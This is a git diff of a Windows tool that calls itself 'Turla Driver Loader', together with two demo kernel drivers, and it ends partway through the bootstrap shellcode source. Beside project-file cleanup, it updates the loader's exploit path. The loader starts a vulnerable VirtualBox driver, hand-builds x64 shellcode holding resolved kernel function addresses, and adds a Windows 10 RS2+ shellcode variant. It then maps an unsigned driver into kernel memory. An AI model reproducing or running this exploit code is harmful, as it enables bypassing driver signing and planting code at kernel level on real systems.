diff --git a/Compiled/Furutaka.exe b/Compiled/Furutaka.exe index 348832e..0e7377b 100644 Binary files a/Compiled/Furutaka.exe and b/Compiled/Furutaka.exe differ diff --git a/Compiled/dummy.sys b/Compiled/dummy.sys index 8a043a6..a280227 100644 Binary files a/Compiled/dummy.sys and b/Compiled/dummy.sys differ diff --git a/Compiled/dummy2.sys b/Compiled/dummy2.sys index 959260a..0b1cc6d 100644 Binary files a/Compiled/dummy2.sys and b/Compiled/dummy2.sys differ diff --git a/Source/DummyDrv/dummy.sln b/Source/DummyDrv/dummy.sln index 28627ee..6c35f1c 100644 --- a/Source/DummyDrv/dummy.sln +++ b/Source/DummyDrv/dummy.sln @@ -1,7 +1,7 @@  Microsoft Visual Studio Solution File, Format Version 12.00 # Visual Studio 14 -VisualStudioVersion = 14.0.24720.0 +VisualStudioVersion = 14.0.25420.1 MinimumVisualStudioVersion = 10.0.40219.1 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}" EndProject diff --git a/Source/DummyDrv/dummy/dummy.vcxproj b/Source/DummyDrv/dummy/dummy.vcxproj index da49f9f..a4e87e1 100644 --- a/Source/DummyDrv/dummy/dummy.vcxproj +++ b/Source/DummyDrv/dummy/dummy.vcxproj @@ -1,14 +1,6 @@  - - Debug - Win32 - - - Release - Win32 - Debug x64 @@ -17,22 +9,6 @@ Release x64 - - Debug - ARM - - - Release - ARM - - - Debug - ARM64 - - - Release - ARM64 - {3D8146DE-8064-46C0-9E70-CEEC357B2290} @@ -45,22 +21,6 @@ 8.1 - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - Windowsv6.3 true @@ -78,38 +38,6 @@ Universal true - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - @@ -118,18 +46,6 @@ - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - DbgengKernelDebugger AllRules.ruleset @@ -143,30 +59,6 @@ .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - false @@ -192,36 +84,6 @@ false - - - false - - - - - false - - - - - false - - - - - false - - - - - false - - - - - false - - false diff --git a/Source/DummyDrv/dummy/main.c b/Source/DummyDrv/dummy/main.c index dade601..c3cd920 100644 --- a/Source/DummyDrv/dummy/main.c +++ b/Source/DummyDrv/dummy/main.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: MAIN.C * -* VERSION: 1.00 +* VERSION: 1.01 * -* DATE: 29 Jan 2016 +* DATE: 20 Apr 2017 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED @@ -29,35 +29,57 @@ DRIVER_INITIALIZE DriverEntry; * */ NTSTATUS DriverEntry( - _In_ struct _DRIVER_OBJECT *DriverObject, - _In_ PUNICODE_STRING RegistryPath - ) + _In_ struct _DRIVER_OBJECT *DriverObject, + _In_ PUNICODE_STRING RegistryPath +) { - LARGE_INTEGER tm; - PEPROCESS Process; + PEPROCESS Process; + KIRQL Irql; + PWSTR sIrql; - tm.QuadPart = -10000000; + /* This parameters are invalid due to nonstandard way of loading and should not be used. */ + UNREFERENCED_PARAMETER(DriverObject); + UNREFERENCED_PARAMETER(RegistryPath); - /* This parameters are invalid due to nonstandard way of loading and should not be used. */ - UNREFERENCED_PARAMETER(DriverObject); - UNREFERENCED_PARAMETER(RegistryPath); + DbgPrint("Hello from kernel mode, system range start is %p, code mapped at %p\n", MmSystemRangeStart, DriverEntry); - DbgPrint("Hello from kernel mode, system range start is %p, code mapped at %p", MmSystemRangeStart, DriverEntry); + Process = PsGetCurrentProcess(); + DbgPrint("I'm at %s, Process : %lu (%p)\n", + __FUNCTION__, + (ULONG)PsGetCurrentProcessId(), + Process); - Process = PsGetCurrentProcess(); + Irql = KeGetCurrentIrql(); - do { + switch (Irql) { - KeDelayExecutionThread(KernelMode, FALSE, &tm); - - DbgPrint("I'm at %s, Process : %lu (%p)", - __FUNCTION__, - (ULONG)PsGetCurrentProcessId(), - Process - ); + case PASSIVE_LEVEL: + sIrql = L"PASSIVE_LEVEL"; + break; + case APC_LEVEL: + sIrql = L"APC_LEVEL"; + break; + case DISPATCH_LEVEL: + sIrql = L"DISPATCH_LEVEL"; + break; + case CMCI_LEVEL: + sIrql = L"CMCI_LEVEL"; + break; + case CLOCK_LEVEL: + sIrql = L"CLOCK_LEVEL"; + break; + case IPI_LEVEL: + sIrql = L"IPI_LEVEL"; + break; + case HIGH_LEVEL: + sIrql = L"HIGH_LEVEL"; + break; + default: + sIrql = L"Unknown Value"; + break; + } + DbgPrint("KeGetCurrentIrql=%ws\n", sIrql); - } while (1); - - return STATUS_SUCCESS; + return STATUS_SUCCESS; } diff --git a/Source/DummyDrv2/dummy.sln b/Source/DummyDrv2/dummy.sln index 28627ee..6c35f1c 100644 --- a/Source/DummyDrv2/dummy.sln +++ b/Source/DummyDrv2/dummy.sln @@ -1,7 +1,7 @@  Microsoft Visual Studio Solution File, Format Version 12.00 # Visual Studio 14 -VisualStudioVersion = 14.0.24720.0 +VisualStudioVersion = 14.0.25420.1 MinimumVisualStudioVersion = 10.0.40219.1 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}" EndProject diff --git a/Source/DummyDrv2/dummy/dummy.vcxproj b/Source/DummyDrv2/dummy/dummy.vcxproj index 8fa877b..fd7810d 100644 --- a/Source/DummyDrv2/dummy/dummy.vcxproj +++ b/Source/DummyDrv2/dummy/dummy.vcxproj @@ -1,14 +1,6 @@  - - Debug - Win32 - - - Release - Win32 - Debug x64 @@ -17,22 +9,6 @@ Release x64 - - Debug - ARM - - - Release - ARM - - - Debug - ARM64 - - - Release - ARM64 - {3D8146DE-8064-46C0-9E70-CEEC357B2290} @@ -45,22 +21,6 @@ 8.1 - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - Windowsv6.3 true @@ -78,38 +38,6 @@ Universal true - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - @@ -118,18 +46,6 @@ - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - DbgengKernelDebugger AllRules.ruleset @@ -143,30 +59,6 @@ .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - false @@ -192,36 +84,6 @@ false - - - false - - - - - false - - - - - false - - - - - false - - - - - false - - - - - false - - false diff --git a/Source/DummyDrv2/dummy/main.c b/Source/DummyDrv2/dummy/main.c index 7b434d3..b933d1c 100644 --- a/Source/DummyDrv2/dummy/main.c +++ b/Source/DummyDrv2/dummy/main.c @@ -1,12 +1,14 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: MAIN.C * -* VERSION: 1.00 +* VERSION: 1.01 * -* DATE: 29 Jan 2016 +* DATE: 20 Apr 2017 +* +* "Driverless" example #2 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED @@ -19,6 +21,51 @@ #define DEBUGPRINT +/* +* PrintIrql +* +* Purpose: +* +* Debug print current irql. +* +*/ +VOID PrintIrql() +{ + KIRQL Irql; + PWSTR sIrql; + + Irql = KeGetCurrentIrql(); + + switch (Irql) { + + case PASSIVE_LEVEL: + sIrql = L"PASSIVE_LEVEL"; + break; + case APC_LEVEL: + sIrql = L"APC_LEVEL"; + break; + case DISPATCH_LEVEL: + sIrql = L"DISPATCH_LEVEL"; + break; + case CMCI_LEVEL: + sIrql = L"CMCI_LEVEL"; + break; + case CLOCK_LEVEL: + sIrql = L"CLOCK_LEVEL"; + break; + case IPI_LEVEL: + sIrql = L"IPI_LEVEL"; + break; + case HIGH_LEVEL: + sIrql = L"HIGH_LEVEL"; + break; + default: + sIrql = L"Unknown Value"; + break; + } + DbgPrint("KeGetCurrentIrql=%u(%ws)\n", Irql, sIrql); +} + /* * DevioctlDispatch * @@ -168,26 +215,6 @@ NTSTATUS CloseDispatch( return Irp->IoStatus.Status; } -VOID ListModules( - _In_ struct _DRIVER_OBJECT *DriverObject - ) -{ - PLIST_ENTRY entry0, entry1; - KLDR_DATA_TABLE_ENTRY *section = (KLDR_DATA_TABLE_ENTRY*)DriverObject->DriverSection; - - if (section == NULL) - return; - - entry0 = section->InLoadOrderLinks.Flink; - entry1 = entry0; - - do { - section = (KLDR_DATA_TABLE_ENTRY*)CONTAINING_RECORD(entry1, KLDR_DATA_TABLE_ENTRY, InLoadOrderLinks); - DbgPrint("Section=%p, %wZ", section, section->BaseDllName); - entry1 = entry1->Flink; - } while (entry1 != entry0); -} - /* * DriverInitialize * @@ -202,37 +229,33 @@ NTSTATUS DriverInitialize( ) { NTSTATUS status; - UNICODE_STRING SymLink, DevName/*, DrvRefName*/; + UNICODE_STRING SymLink, DevName; PDEVICE_OBJECT devobj; ULONG t; - WCHAR szDevName[] = { L'\\', L'D', L'e', L'v', L'i', L'c', L'e', L'\\', L'T', L'D', L'L', L'D', 0 }; - WCHAR szSymLink[] = { L'\\', L'D', L'o', L's', L'D', L'e', L'v', L'i', L'c', L'e', L's', L'\\', L'T', L'D', L'L', L'D', 0 }; -// WCHAR szNullDrv[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'N', L'u', L'l', L'l', 0 }; -// PDRIVER_OBJECT driverObject; //RegistryPath is NULL - UNREFERENCED_PARAMETER(RegistryPath); + UNREFERENCED_PARAMETER(RegistryPath); #ifdef DEBUGPRINT - DbgPrint("%s", __FUNCTION__); + DbgPrint("%s\n", __FUNCTION__); #endif - RtlInitUnicodeString(&DevName, szDevName); + RtlInitUnicodeString(&DevName, L"\\Device\\TDLD"); status = IoCreateDevice(DriverObject, 0, &DevName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, TRUE, &devobj); #ifdef DEBUGPRINT - DbgPrint("%s IoCreateDevice(%wZ) = %lx", __FUNCTION__, DevName, status); + DbgPrint("%s IoCreateDevice(%wZ) = %lx\n", __FUNCTION__, DevName, status); #endif if (!NT_SUCCESS(status)) { return status; } - RtlInitUnicodeString(&SymLink, szSymLink); + RtlInitUnicodeString(&SymLink, L"\\DosDevices\\TDLD"); status = IoCreateSymbolicLink(&SymLink, &DevName); #ifdef DEBUGPRINT - DbgPrint("%s IoCreateSymbolicLink(%wZ) = %lx", __FUNCTION__, SymLink, status); + DbgPrint("%s IoCreateSymbolicLink(%wZ) = %lx\n", __FUNCTION__, SymLink, status); #endif devobj->Flags |= DO_BUFFERED_IO; @@ -246,17 +269,6 @@ NTSTATUS DriverInitialize( DriverObject->DriverUnload = NULL; //nonstandard way of driver loading, no unload devobj->Flags &= ~DO_DEVICE_INITIALIZING; -/* - RtlInitUnicodeString(&DrvRefName, szNullDrv); - if (NT_SUCCESS(ObReferenceObjectByName(&DrvRefName, OBJ_CASE_INSENSITIVE, NULL, 0, - *IoDriverObjectType, KernelMode, NULL, &driverObject))) - { - DbgPrint("drvObj %p", driverObject); - ListModules(driverObject); - ObDereferenceObject(driverObject); - } - */ - return status; } @@ -274,22 +286,23 @@ NTSTATUS DriverEntry( ) { NTSTATUS status; - UNICODE_STRING drvName; - WCHAR szDrvName[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'T', L'D', L'L', L'D', 0 }; - + UNICODE_STRING drvName; + /* This parameters are invalid due to nonstandard way of loading and should not be used. */ UNREFERENCED_PARAMETER(DriverObject); UNREFERENCED_PARAMETER(RegistryPath); + PrintIrql(); + #ifdef DEBUGPRINT - DbgPrint("%s", __FUNCTION__); + DbgPrint("%s\n", __FUNCTION__); #endif - RtlInitUnicodeString(&drvName, szDrvName); + RtlInitUnicodeString(&drvName, L"\\Driver\\TDLD"); status = IoCreateDriver(&drvName, &DriverInitialize); #ifdef DEBUGPRINT - DbgPrint("%s IoCreateDriver(%wZ) = %lx", __FUNCTION__, drvName, status); + DbgPrint("%s IoCreateDriver(%wZ) = %lx\n", __FUNCTION__, drvName, status); #endif return status; diff --git a/Source/DummyDrv2/dummy/main.h b/Source/DummyDrv2/dummy/main.h index e69a424..4e203fd 100644 --- a/Source/DummyDrv2/dummy/main.h +++ b/Source/DummyDrv2/dummy/main.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: MAIN.H * -* VERSION: 1.00 +* VERSION: 1.01 * -* DATE: 29 Jan 2016 +* DATE: 20 Apr 2017 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED @@ -24,21 +24,6 @@ IoCreateDriver( IN PDRIVER_INITIALIZE InitializationFunction ); -NTKERNELAPI -NTSTATUS -ObReferenceObjectByName( - __in PUNICODE_STRING ObjectName, - __in ULONG Attributes, - __in_opt PACCESS_STATE AccessState, - __in_opt ACCESS_MASK DesiredAccess, - __in POBJECT_TYPE ObjectType, - __in KPROCESSOR_MODE AccessMode, - __inout_opt PVOID ParseContext, - __out PVOID *Object - ); - -extern POBJECT_TYPE *IoDriverObjectType; - _Dispatch_type_(IRP_MJ_DEVICE_CONTROL) DRIVER_DISPATCH DevioctlDispatch; _Dispatch_type_(IRP_MJ_CREATE) @@ -88,25 +73,3 @@ typedef struct _INOUT_PARAM { ULONG Param3; ULONG Param4; } INOUT_PARAM, *PINOUTPARAM; - -typedef struct _KLDR_DATA_TABLE_ENTRY { - LIST_ENTRY InLoadOrderLinks; - PVOID ExceptionTable; - ULONG ExceptionTableSize; - // ULONG padding on IA64 - PVOID GpValue; - PVOID NonPagedDebugInfo; - PVOID DllBase; - PVOID EntryPoint; - ULONG SizeOfImage; - UNICODE_STRING FullDllName; - UNICODE_STRING BaseDllName; - ULONG Flags; - USHORT LoadCount; - USHORT __Unused5; - PVOID SectionPointer; - ULONG CheckSum; - // ULONG padding on IA64 - PVOID LoadedImports; - PVOID PatchInformation; -} KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY; diff --git a/Source/Furutaka/Furutaka.vcxproj b/Source/Furutaka/Furutaka.vcxproj index ce94cc4..ddc2985 100644 --- a/Source/Furutaka/Furutaka.vcxproj +++ b/Source/Furutaka/Furutaka.vcxproj @@ -53,7 +53,7 @@ false .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ - NativeRecommendedRules.ruleset + AllRules.ruleset false @@ -78,23 +78,23 @@ Level4 - MaxSpeed + Full true true NDEBUG;_CONSOLE;%(PreprocessorDefinitions) - true CompileAsC true true false - Guard - MultiThreaded + MultiThreadedDLL + Neither + true Console true true - true + false TDLMain true RequireAdministrator diff --git a/Source/Furutaka/global.h b/Source/Furutaka/global.h index b15eb0d..b886899 100644 --- a/Source/Furutaka/global.h +++ b/Source/Furutaka/global.h @@ -4,9 +4,9 @@ * * TITLE: GLOBAL.H * -* VERSION: 1.10 +* VERSION: 1.11 * -* DATE: 17 Apr 2017 +* DATE: 20 Apr 2017 * * Common header file for the program support routines. * diff --git a/Source/Furutaka/main.c b/Source/Furutaka/main.c index c0b7c24..c6b259e 100644 --- a/Source/Furutaka/main.c +++ b/Source/Furutaka/main.c @@ -4,9 +4,9 @@ * * TITLE: MAIN.C * -* VERSION: 1.10 +* VERSION: 1.11 * -* DATE: 17 Apr 2017 +* DATE: 20 Apr 2017 * * Furutaka entry point. * @@ -34,17 +34,18 @@ BOOL g_ConsoleOutput = FALSE; BOOL g_VBoxInstalled = FALSE; WCHAR g_BE = 0xFEFF; +ULONG g_NtBuildNumber = 0; + #define VBoxDrvSvc TEXT("VBoxDrv") #define supImageName "furutaka" #define supImageHandle 0x1a000 #define PAGE_SIZE 0x1000 -#define scDataOffset 0x214 //shellcode data offset -#define T_LOADERTITLE TEXT("Turla Driver Loader v1.1 (17/04/17)") +#define T_LOADERTITLE TEXT("Turla Driver Loader v1.1.1 (20/04/17)") #define T_LOADERUNSUP TEXT("Unsupported WinNT version\r\n") #define T_LOADERRUN TEXT("Another instance running, close it before\r\n") #define T_LOADERUSAGE TEXT("Usage: loader drivertoload\n\re.g. loader mydrv.sys\r\n") -#define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.0 started\r\n(c) 2016 - 2017 TDL Project\r\nSupported x64 OS : 7 and above\r\n") +#define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.1 started\r\n(c) 2016 - 2017 TDL Project\r\nSupported x64 OS : 7 and above\r\n") /* * TDLVBoxInstalled @@ -83,8 +84,8 @@ BOOL TDLVBoxInstalled( * */ void TDLRelocImage( - ULONG_PTR Image, - ULONG_PTR NewImageBase + _In_ ULONG_PTR Image, + _In_ ULONG_PTR NewImageBase ) { PIMAGE_OPTIONAL_HEADER popth; @@ -139,9 +140,9 @@ void TDLRelocImage( * */ ULONG_PTR TDLGetProcAddress( - ULONG_PTR KernelBase, - ULONG_PTR KernelImage, - LPCSTR FunctionName + _In_ ULONG_PTR KernelBase, + _In_ ULONG_PTR KernelImage, + _In_ LPCSTR FunctionName ) { ANSI_STRING cStr; @@ -163,9 +164,9 @@ ULONG_PTR TDLGetProcAddress( * */ void TDLResolveKernelImport( - ULONG_PTR Image, - ULONG_PTR KernelImage, - ULONG_PTR KernelBase + _In_ ULONG_PTR Image, + _In_ ULONG_PTR KernelImage, + _In_ ULONG_PTR KernelBase ) { PIMAGE_OPTIONAL_HEADER popth; @@ -211,8 +212,9 @@ void TDLResolveKernelImport( * */ void TDLExploit( - LPVOID Shellcode, - ULONG CodeSize + _In_ LPVOID Shellcode, + _In_ ULONG CodeSize, + _In_ ULONG DataOffset ) { SUPCOOKIE Cookie; @@ -307,7 +309,7 @@ void TDLExploit( ultohex(CodeSize, _strend(text)); _strcat(text, TEXT("\r\n\tDriver image mapped at 0x")); - u64tohex((ULONG_PTR)ImageBase + scDataOffset, _strend(text)); + u64tohex((ULONG_PTR)ImageBase + DataOffset, _strend(text)); cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); } @@ -376,13 +378,14 @@ void TDLExploit( * */ UINT TDLMapDriver( - LPWSTR lpDriverFullName + _In_ LPWSTR lpDriverFullName ) { UINT result = (UINT)-1; - ULONG isz; + ULONG isz, prologueSize, dataOffset; SIZE_T memIO; - ULONG_PTR KernelBase, KernelImage = 0, xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0; + ULONG_PTR KernelBase, KernelImage = 0; + ULONG_PTR xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0, xZwClose = 0; HMODULE Image = NULL; PIMAGE_NT_HEADERS FileHeader; PBYTE Buffer = NULL; @@ -443,16 +446,30 @@ UINT TDLMapDriver( cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); } - RtlInitString(&routineName, "PsCreateSystemThread"); - status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread); - if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error, PsCreateSystemThread address not found"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x")); - u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + if (g_NtBuildNumber < 15063) { + RtlInitString(&routineName, "PsCreateSystemThread"); + status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread); + if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, PsCreateSystemThread address not found"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x")); + u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } + + RtlInitString(&routineName, "ZwClose"); + status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xZwClose); + if ((!NT_SUCCESS(status)) || (xZwClose == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, ZwClose address not found"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: ZwClose 0x")); + u64tohex(KernelBase + (xZwClose - KernelImage), _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } } memIO = isz + PAGE_SIZE; @@ -470,25 +487,49 @@ UINT TDLMapDriver( // mov rcx, ExAllocatePoolWithTag // mov rdx, PsCreateSystemThread + // mov r8, ZwClose Buffer[0x00] = 0x48; // mov rcx, xxxxx Buffer[0x01] = 0xb9; *((PULONG_PTR)&Buffer[2]) = KernelBase + (xExAllocatePoolWithTag - KernelImage); - Buffer[0x0a] = 0x48; // mov rdx, xxxxx - Buffer[0x0b] = 0xba; - *((PULONG_PTR)&Buffer[0x0c]) = - KernelBase + (xPsCreateSystemThread - KernelImage); - RtlCopyMemory(Buffer + 0x14, - TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code)); - RtlCopyMemory(Buffer + scDataOffset, Image, isz); + if (g_NtBuildNumber < 15063) { + Buffer[0x0a] = 0x48; // mov rdx, xxxxx + Buffer[0x0b] = 0xba; + *((PULONG_PTR)&Buffer[0x0c]) = + KernelBase + (xPsCreateSystemThread - KernelImage); + Buffer[0x14] = 0x49; //mov r8, xxxxx + Buffer[0x15] = 0xb8; + *((PULONG_PTR)&Buffer[0x16]) = + KernelBase + (xZwClose - KernelImage); + + prologueSize = 0x1e; + } + else { + prologueSize = 0x0a; + } + + dataOffset = prologueSize + MAX_SHELLCODE_LENGTH; + + if (g_NtBuildNumber < 15063) { + RtlCopyMemory(Buffer + prologueSize, + TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code)); + cuiPrintText(g_ConOut, TEXT("Ldr: Default bootstrap shellcode selected"), g_ConsoleOutput, TRUE); + } + else { + RtlCopyMemory(Buffer + prologueSize, + TDLBootstrapLoader_code_w10rs2, sizeof(TDLBootstrapLoader_code_w10rs2)); + cuiPrintText(g_ConOut, TEXT("Ldr: Windows 10 RS2+ bootstrap shellcode selected"), g_ConsoleOutput, TRUE); + } + + RtlCopyMemory(Buffer + dataOffset, Image, isz); cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE); - TDLResolveKernelImport((ULONG_PTR)Buffer + scDataOffset, KernelImage, KernelBase); + TDLResolveKernelImport((ULONG_PTR)Buffer + dataOffset, KernelImage, KernelBase); cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), g_ConsoleOutput, TRUE); - TDLExploit(Buffer, isz + PAGE_SIZE); + TDLExploit(Buffer, isz + PAGE_SIZE, dataOffset); result = 0; break; } @@ -575,14 +616,15 @@ HANDLE TDLStartVulnerableDriver( } } - //if vbox installed backup it driver, do it before dropping our + // + // If vbox installed backup it driver, do it before dropping our + // Ignore error if file not found + // if (g_VBoxInstalled) { if (supBackupVBoxDrv(FALSE) == FALSE) { cuiPrintText(g_ConOut, TEXT("Ldr: Error while doing VirtualBox driver backup"), g_ConsoleOutput, TRUE); - - break; } } @@ -717,7 +759,7 @@ void TDLStopVulnerableDriver( * */ UINT TDLProcessCommandLine( - LPWSTR lpCommandLine + _In_ LPWSTR lpCommandLine ) { UINT retVal = (UINT)-1; @@ -765,7 +807,7 @@ void TDLMain() UINT uResult = 0; DWORD dwTemp; LONG x; - OSVERSIONINFOW osv; + OSVERSIONINFO osv; WCHAR text[256]; __security_init_cookie(); @@ -795,7 +837,6 @@ void TDLMain() T_LOADERINTRO, g_ConsoleOutput, TRUE); - x = InterlockedIncrement((PLONG)&g_lApplicationInstances); if (x > 1) { cuiPrintText(g_ConOut, @@ -817,6 +858,8 @@ void TDLMain() break; } + g_NtBuildNumber = osv.dwBuildNumber; + _strcpy(text, TEXT("Ldr: Windows v")); ultostr(osv.dwMajorVersion, _strend(text)); _strcat(text, TEXT(".")); @@ -825,6 +868,10 @@ void TDLMain() ultostr(osv.dwBuildNumber, _strend(text)); cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + // + // If VirtualBox installed on the same machine warn user, + // however this is unnecessary can lead to any conflicts. + // g_VBoxInstalled = TDLVBoxInstalled(); if (g_VBoxInstalled) { cuiPrintText(g_ConOut, diff --git a/Source/Furutaka/resource.rc b/Source/Furutaka/resource.rc index 351f442..9b6d71f 100644 Binary files a/Source/Furutaka/resource.rc and b/Source/Furutaka/resource.rc differ diff --git a/Source/Furutaka/shellcode.h b/Source/Furutaka/shellcode.h index 469aa42..8bf5be4 100644 --- a/Source/Furutaka/shellcode.h +++ b/Source/Furutaka/shellcode.h @@ -4,9 +4,9 @@ * * TITLE: SHELLCODE.H * -* VERSION: 1.10 +* VERSION: 1.11 * -* DATE: 17 Apr 2017 +* DATE: 20 Apr 2017 * * Loader bootstrap shellcode. * @@ -22,8 +22,7 @@ typedef PVOID(NTAPI *PfnExAllocatePoolWithTag)( _In_ POOL_TYPE PoolType, _In_ SIZE_T NumberOfBytes, - _In_ ULONG Tag - ); + _In_ ULONG Tag); typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)( _Out_ PHANDLE ThreadHandle, @@ -32,8 +31,14 @@ typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)( _In_opt_ HANDLE ProcessHandle, _Out_opt_ PCLIENT_ID ClientId, _In_ PKSTART_ROUTINE StartRoutine, - _In_opt_ PVOID StartContext - ); + _In_opt_ PVOID StartContext); + +typedef NTSTATUS (NTAPI *PfnZwClose)( + _In_ HANDLE Handle); + +typedef NTSTATUS(NTAPI *PfnDriverEntry)(); + +#define MAX_SHELLCODE_LENGTH 0x300 /* * TDLBootstrapLoader @@ -46,10 +51,11 @@ typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)( /* void TDLBootstrapLoader( PfnExAllocatePoolWithTag ExAllocatePoolWithTag, - PfnPsCreateSystemThread PsCreateSystemThread) + PfnPsCreateSystemThread PsCreateSystemThread, + PfnZwClose ZwClose) { ULONG_PTR pos, exbuffer, - Image = ((ULONG_PTR)&TDLBootstrapLoader) + 0x200; + Image = ((ULONG_PTR)&TDLBootstrapLoader) + MAX_SHELLCODE_LENGTH; PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image; PIMAGE_FILE_HEADER fileh = @@ -110,36 +116,148 @@ void TDLBootstrapLoader( for (pos = 0; pos < isz; pos++) ((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos]; + th = NULL; InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL); - PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL, - (PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL); + if (NT_SUCCESS(PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL, + (PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL))) + { 